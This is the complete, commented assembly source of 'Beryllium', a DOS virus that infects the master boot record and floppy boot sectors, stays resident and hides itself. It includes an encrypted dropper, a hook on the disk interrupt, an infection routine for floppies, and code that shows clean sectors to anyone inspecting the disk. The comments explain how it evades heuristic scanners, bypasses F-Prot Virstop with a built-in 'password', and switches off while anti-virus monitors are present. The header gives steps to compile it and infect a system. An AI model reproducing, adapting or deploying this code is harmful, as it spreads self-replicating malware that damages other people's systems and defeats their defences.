;============================================================================= 
; Virus Name:  Beryllium 
;
;      Notes:  
;             - resident, stealth, boot sector/MBR infector 
;             - places only 22 bytes of benign code in a boot sector or MBR 
;               thereby totally avoiding heuristic alarms even when the virus 
;               is not resident to provide stealth
;             - resident virus not detected by F-Prot Virstop due to a
;               "password" located at installed virus offset 102h 
;             - detects the presence of A-V monitors and deactivates while
;               they are present
;             - MBR and floppy boot sector stealth 
;             - post-infection MBR write protection 
;             - functionally infects all floppy formats in drives A and B 
; 
; To Compile: 
;             - use shareware A86 assembler
;             - type "a86 berylium.a86" 
;             - run the berylium.com file
;             - encrypted dropper is produced as "dropbery.com" 
;             - if you desire to infect your system, run dropbery.com
;============================================================================= 

boot            equ     06ad            ;delta offset for boot location
drop            equ     041             ;delta offset for drop of virus
res             equ     0153            ;delta offset for resident location
oldlength       equ     016             ;infection code length (boot sector)
virus_tag1      equ     0c033           ;infection tag (main body code)
virus_tag2      equ     0ea             ;infection tag (boot sector code)

;-----------------------------------------------------------------------------
; Encrypt - encrypts dropper and creates dropper file
;-----------------------------------------------------------------------------

encrypt:
        mov     bx,offset dropper       ;starting point for encryption
        mov     cl,04                   ;set shift/rotate count

scramble_it:
        mov     ax,[bx]                 ;move target word into ax     
        rol     ax,cl                   ;rotate word left "cl" positions
        mov     [bx],ax                 ;move word back to memory
        inc     bx                      ;point to next byte 
        cmp     bx,offset MBR_buffer-2  ;end of code to encrypt?
        jbe     scramble_it             ;if not, do it again

        mov     ah,03c                  ;create file function
        xor     cx,cx                   ;attribute = 0 = read/write
        mov     dx,offset file_name     ;point to ASCIIZ file name string
        int     021                     ;create file
        jc      exit_encrypt            ;if flag=fail, exit

        mov     bx,ax                   ;load bx with new file's handle

        mov     ah,040                  ;write to file with handle
        mov     cx,droplength           ;number of bytes to write
        mov     dx,offset decrypt       ;pointer to data to write
        int     021                     ;write encrypted dropper
        jc      exit_encrypt            ;if flag=fail, exit

        mov     ah,03e                  ;close file
        int     021
       
exit_encrypt:
        mov     ax,04c00                ;terminate w/return code
        int     021                     ;terminate program

file_name       db "dropbery.com",0     ;ASCIIZ dropper file name

;-----------------------------------------------------------------------------
; Decrypt - decrypts dropper using a method not currently recognized as 
; hostile by heuristic scanners 
;-----------------------------------------------------------------------------

decrypt:
        mov     bx,offset MBR_buffer-drop-2 ;starting point for decryption
        mov     cl,04                   ;set shift/rotate count

unscramble_it:
        mov     ax,[bx]                 ;move target word into ax       
        ror     ax,cl                   ;rotate word right "cl" positions
        mov     [bx],ax                 ;move word back to memory       
        dec     bx                      ;point to next byte
        cmp     bx,offset dropper-drop  ;end of code to decrypt?
        jae     unscramble_it           ;if not, do it again

;-----------------------------------------------------------------------------
; Dropper - infects MBR if not already infected and if no A-V monitor program 
; is present
;-----------------------------------------------------------------------------

dropper:
        push    ds                      ;preserve ds

        xor     ax,ax                   ;zero ax
        mov     ds,ax                   ;point data seg. to interrupt vector
                                        ; table
        cmp     byte ptr [040*4+3],0c0  ;int40 segment pointing to ROM?
        pop     ds                      ;restore ds
        jb      exit_dropper            ;if not, do not attempt to infect MBR

        mov     ah,035                  ;load ah with installation check byte
        int     013                     ;check for installed virus
        cmp     al,ah                   ;al = ah?
        je      exit_dropper            ;if so, already installed, so MBR must
                                        ; already be infected
drop_it:
        mov     ax,0201                 ;select read-one-sector function
        mov     bx,offset MBR_buffer-drop ;set load offset
        mov     cx,02                   ;cylinder 0, sector 2
        mov     dx,080                  ;fixed disk 0 (C)
        int     013                     ;load to buffer
        jc      exit_dropper            ;if flag=fail, exit

        cmp     word ptr [bx+070],virus_tag1 ;beryllium code present?
        je      exit_dropper                 ;if so, exit dropper             
        
        mov     cx,virlength            ;set move count
        mov     si,offset beryllium-drop ;set source address of virus code    
        lea     di,[bx+070]             ;set destination within buffer
        rep     movsb                   ;infect sector in memory

        mov     ax,0301                 ;write infected sector to
        mov     cl,02                   ; cylinder 0, sector 2
        int     013
        jc      exit_dropper            ;if flag=fail, exit

        mov     ax,0201                 ;read original MBR
        dec     cx                      ; from cylinder 0, sector 1
        int     013
        jc      exit_dropper            ;if flag=fail, exit

        mov     ax,0301                 ;write original MBR
        mov     cl,03                   ; to cylinder 0, sector 3
        int     013                     
        jc      exit_dropper            ;if flag=fail, exit

        mov     byte ptr [offset head-drop],dh   ;save location (head &     
        mov     byte ptr [offset sector-drop],02 ; sector) of virus in MBR's
                                                 ;  viral bootstrap code    
        mov     cx,oldlength            ;set number of bytes to move
        mov     si,offset newbytes-drop ;set source address of infection code
        mov     di,bx                   ;set destination to MBR in memory 
        cld                             ;clear direction flag (fwd)
        rep     movsb                   ;infect MBR with bootstrap code

        mov     ax,0301                 ;write infected MBR to
        inc     cx                      ; cylinder 0, sector 1
        int     013 

exit_dropper:
        mov     ax,04c00                ;terminate w/return code
        int     021                     ;terminate program

;-----------------------------------------------------------------------------
; Beryllium - main body of virus, executes at boot, infects MBR if boot is 
; from floppy and MBR is not infected, installs virus in memory if not 
; installed
;-----------------------------------------------------------------------------

beryllium:
        xor     ax,ax                   ;zero ax
        mov     ds,ax                   ;set ds = 0
 
        cli                             ;clear interrupts
        mov     ss,ax                   ;set ss = 0
        mov     bx,07c00                ;set bx to boot code offset
        mov     sp,bx                   ;ditto for sp
        sti                             ;set interrupts

        cmp     dl,080                  ;is this a hard drive boot?
        jne     floppy_boot             ;if not, jump to check/infect MBR

        mov     ax,0201                 ;if so, load orignal MBR to 7c00h
        mov     cx,03                   ;cylinder 0, sector 3
        int     013                     ;do it

        jmp     short install           ;install virus in memory

floppy_boot:
        mov     si,offset oldbytes+boot ;load source offset of original bytes
        mov     di,07c3e                ;load destination in boot sector code
        mov     cx,oldlength            ;set number of bytes to move
        push    cx                      ;save it for later
        cld                             ;clear direction (fwd)
        rep     movsb                   ;restore original bytes to boot sector
                                        ;in memory
        mov     ax,0201                 ;select read-one-sector function
        mov     bh,06                   ;set load offset
        inc     cx                      ;cylinder 0, sector 1 (MBR)
        mov     dx,080                  ;fixed disk 0 (C)
        int     013                     ;load MBR to 0:0600h

        cmp     byte ptr [0611],virus_tag2 ;MBR infected?
        je      install                    ;if so, install virus in memory
        
        mov     ax,0301                 ;if not, save orig. MBR
        mov     cx,03                   ;at cylinder 0, sector 3
        int     013                     ;write MBR

        mov     byte ptr [offset head+boot],dh   ;save location (head &     
        mov     byte ptr [offset sector+boot],02 ; sector) of virus in MBR's
                                                 ;  viral bootstrap code    
        pop     cx                      ;set number of bytes to move
        mov     si,offset newbytes+boot ;set source address of infection code
        mov     di,bx                   ;set destination to MBR in memory 
        rep     movsb                   ;infect MBR

        mov     ax,0302                 ;select write-two-sectors function
        inc     cx                      ;cylinder 0, sector 1
        int     013                     ;write infected MBR to sector 1 and
                                        ;continuation of virus to sector 2
install:
        mov     ah,035                  ;load ah with installation check byte
        int     013                     ;check for installed virus
        cmp     al,ah                   ;al = ah?
        je      exec_boot               ;if so, already installed, so jump to
                                        ; execute boot code in memory
        dec     word ptr [0413]         ;lower top-of-mem by 1KB
        int     012                     ;get conventional memory count in #KB

        mov     cx,0106                 ;load move and shift values
        shl     ax,cl                   ;calculate segment for virus residence

        mov     es,ax                   ;load es with destination segment
        xchg    [013*4+2],ax            ;steal int13 segment
        mov     [offset old13+boot+2],ax ;store original segment in virus
        mov     ax,offset int13-res     ;load res. off. of virus int13 
        xchg    [013*4],ax              ;steal int13 offset
        mov     [offset old13+boot],ax  ;store original offset in virus

        mov     si,0870                 ;set source offset
        mov     di,0070                 ;set destination offset
        rep     movsw                   ;move virus to es:0h (9fc0:0000h in 
                                        ; system w/640K conventional memory)
exec_boot:
        jmp     0000:07c00              ;execute boot code

;-----------------------------------------------------------------------------
; Int13 - responds to installation check from dropper and boot routines, 
; provides MBR stealth and write-protection, infects floppy if not already
; infected and if no A-V monitor is present, provides floppy stealth
;-----------------------------------------------------------------------------

chain_int13:
        pop     ds                      ;restore registers
        pop     di
        pop     si
        jmp     short virstop         
        db      078,078                 ;Virstop "password"

virstop:
        db      0ea                     ;"jmp far" to location specified in
                                        ; old13
old13   dw      ?, ?                    ;offset and segment of original int13
                                        ; handler
int13:
        cmp     ah,035                  ;installation check?
        jne     MBR_stealth             ;if not, continue
        mov     al,ah                   ;if so, put ah in al for confirmation
        iret                            ; and return

MBR_stealth:
        push    si                      ;preserve registers
        push    di
        push    ds

        cmp     cx,01                   ;track 0, sector 1?
        jne     chain_int13             ;if not, we're not interested

        cmp     dx,080                  ;head 0, fixed disk 0?
        ja      chain_int13             ;if above, exit
        jb      infect_floppy           ;if below, must be floppy access

        cmp     ah,03                   ;write to fixed disk MBR?
        je      sim_IO                  ;if so, simulate write

        mov     cl,03                   ;point to relocated original MBR 
        call    bios_int13              ;load it to disk I/O buffer
        mov     cl,01                   ;restore cl to point to sector 1

sim_IO:
        xor     ah,ah                   ;clear ah and carry flag to simulate
        clc                             ; succcessful write

exit_int13:
        pop     ds                      ;restore registers
        pop     di
        pop     si

        retf    02                      ;return to calling routine

infect_floppy:
        cmp     ah,02                   ;read request?
        jne     chain_int13             ;if not, exit

        cmp     dl,01                   ;floppy drive 'A' or 'B'?
        ja      chain_int13             ;if not, exit

        call    bios_int13              ;read boot sector
        jc      exit_int13              ;if flag=fail, exit to retry

        cmp     byte ptr es:[bx+04f],virus_tag2 ;boot sector infected?
        je      floppy_stealth                  ;if so, hide infection

        xor     cx,cx                   ;zero cx
        mov     ds,cx                   ;point ds to system vector table

        cmp     byte ptr [040*4+3],0c0  ;int40 pointing to ROM?
        jb      floppy_stealth          ;if not, do not infect boot sector

        push    bx                      ;preserve registers
        push    es

        push    es
        pop     ds                      ;set ds = es 

        push    cs
        pop     es                      ;set es = cs

        lea     si,[bx+03e]             ;set source offset to boot sector
        mov     di,offset oldbytes-res  ;set destination to code storage
        mov     cx,oldlength            ;set number of bytes to move/save
        push    cx                      ;save that number for later
        cld                             ;clear direction flag (fwd)
        rep     movsb                   ;store original boot code in virus

        mov     [bx],03ceb              ;put jump at start of boot code

        mov     al,byte ptr [bx+016]    ;load # sectors/FAT from BPB
        mul     byte ptr [bx+010]       ;multiply by number of FATs
        inc     ax                      ;add boot sector to count
        push    ax                      ;save it for later
        mov     ax,[bx+011]             ;load max. # of files from BPB
        mov     cl,04                   ;divide by 16 to get # of root
        shr     ax,cl                   ; directory sectors
        pop     cx                      ;pop boot sector + FAT sector count
        add     cx,ax                   ;add # of directory sectors
        sub     cx,[bx+018]             ;subtract # of sectors per track
                                        ; to get target sector number
        inc     dh                      ;specify head 1
        mov     cs:byte ptr [offset head-res],dh   ;set newbytes head/sector
        mov     cs:byte ptr [offset sector-res],cl ; values to point to virus

        mov     ax,0301                 ;select write-one-sector function
        xor     bx,bx                   ;set offset to point to virus
        call    bios_int13              ;write virus to last root directory
                                        ; sector
        pop     cx                      ;restore registers
        pop     es
        pop     bx

        push    cs
        pop     ds                      ;set ds = cs

        mov     si,offset newbytes-res  ;point to infection code
        lea     di,[bx+03e]             ;set destination to boot sector code
        rep     movsb                   ;infect boot sector in memory

        mov     ax,0301                 ;select write-one-sector function
        inc     cx                      ;track 0, sector 1
        dec     dh                      ;head 0, drive "dl"
        call    bios_int13              ;write infected boot sector
 
floppy_stealth:
        push    cs
        pop     ds                      ;set ds = cs

        mov     si,offset oldbytes-res  ;point to stored original boot code
        lea     di,[bx+03e]             ;set destination to boot sector
        mov     cx,oldlength            ;set number of bytes to move
        cld                             ;clear direction flag (fwd)
        rep     movsb                   ;restore original bytes in memory

        inc     cx                      ;restore cx to 0001h

        jmp     short sim_IO            ;return sanitized boot sector to
                                        ; calling routine
bios_int13:
        pushf                           ;push flags
        cs:
        call    dword ptr [offset old13-res] ;call original int13 handler
        ret                             

;-----------------------------------------------------------------------------
; Newbytes - the only viral code that actually resides in the boot sector or 
; MBR.  Its purpose is simply to load the main body of the virus to 0000:0800 
; and to transfer control to it.  This is the only area that would need to be 
; modified to avoid anti-viral scan string detection.
;-----------------------------------------------------------------------------

newbytes:
        xor     ax,ax                   ;zero ax
        mov     es,ax                   ;set es = 0 
        mov     ax,0201                 ;select read-one-sector function
        mov     bx,0800                 ;set disk I/O buffer offset

        db      0b9                     ;"mov cx,00xx"
sector  db      ?                       ;sector number (xx)
        db      00                      ;track 0 

        db      0b6                     ;"mov dh,xx"
head    db      ?                       ;head number (xx)

        int     013                     ;load virus to 0000:0800h

        jmp     0000:0870               ;jump to execute virus code

oldbytes:
        db      oldlength  dup  ?       ;storage location for original first 
                                        ; 22d bytes of the boot sector
                              
        db      0,0,'BERYLLIUM!',0,0    ;credits

MBR_buffer:

droplength      equ     offset MBR_buffer - offset decrypt
virlength       equ     offset MBR_buffer - offset beryllium
decryptlength   equ     offset MBR_buffer - offset dropper

        end     beryllium